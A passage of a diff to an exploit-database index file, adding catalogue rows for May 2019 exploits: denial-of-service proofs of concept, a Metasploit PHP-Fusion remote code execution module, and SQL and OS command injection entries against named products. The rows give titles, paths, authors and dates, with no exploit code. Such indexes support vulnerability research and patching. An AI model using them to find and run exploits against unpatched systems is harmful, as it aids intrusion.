(PoC)",2019-05-13,"Victor Mondragón",dos,windows, 46837,exploits/multiple/dos/46837.html,"Google Chrome V8 - Turbofan JSCallReducer::ReduceArrayIndexOfIncludes Out-of-Bounds Read/Write",2019-05-13,"Google Security Research",dos,multiple, +46842,exploits/windows/dos/46842.py,"Selfie Studio 2.17 - 'Resize Image' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows, +46843,exploits/windows/dos/46843.py,"TwistedBrush Pro Studio 24.06 - 'Resize Image' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows, +46844,exploits/windows/dos/46844.py,"TwistedBrush Pro Studio 24.06 - 'Script Recorder' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows, +46845,exploits/windows/dos/46845.py,"TwistedBrush Pro Studio 24.06 - '.srp' Denial of Service (PoC)",2019-05-14,"Alejandra Sánchez",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -17401,6 +17405,7 @@ id,file,description,date,author,type,platform,port 46812,exploits/windows_x86/remote/46812.rb,"Google Chrome 72.0.3626.119 - 'FileReader' Use-After-Free (Metasploit)",2019-05-08,Metasploit,remote,windows_x86, 46813,exploits/multiple/remote/46813.rb,"PostgreSQL 9.3 - COPY FROM PROGRAM Command Execution (Metasploit)",2019-05-08,Metasploit,remote,multiple,5432 46814,exploits/multiple/remote/46814.rb,"Oracle Weblogic Server - 'AsyncResponseService' Deserialization Remote Code Execution (Metasploit)",2019-05-08,Metasploit,remote,multiple,7001 +46839,exploits/php/remote/46839.rb,"PHP-Fusion 9.03.00 - 'Edit Profile' Remote Code Execution (Metasploit)",2019-05-14,AkkuS,remote,php, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -41263,3 +41268,7 @@ id,file,description,date,author,type,platform,port 46834,exploits/php/webapps/46834.txt,"SOCA Access Control System 180612 - Cross-Site Request Forgery (Add Admin)",2019-05-13,LiquidWorm,webapps,php, 46835,exploits/php/webapps/46835.txt,"XOOPS 2.5.9 - SQL Injection",2019-05-13,"felipe andrian",webapps,php,80 46838,exploits/php/webapps/46838.txt,"OpenProject 5.0.0 - 8.3.1 - SQL Injection",2019-05-13,"SEC Consult",webapps,php, +46840,exploits/php/webapps/46840.txt,"Sales ERP 8.1 - Multiple SQL Injection",2019-05-14,"Mehmet EMIROGLU",webapps,php,80 +46841,exploits/hardware/webapps/46841.txt,"D-Link DWL-2600AP - Multiple OS Command Injection",2019-05-14,"Raki Ben Hamouda",webapps,hardware, +46846,exploits/php/webapps/46846.txt,"Schneider Electric U.Motion Builder 1.3.4 - 'track_import_export.php object_id' Unauthenticated Command Injection",2019-05-14,"Julien Ahrens",webapps,php,80 +46847,exploits/php/webapps/46847.txt,"PasteShr 1.6 - Multiple SQL Injection",2019-05-14,"Mehmet EMIROGLU",webapps,php,80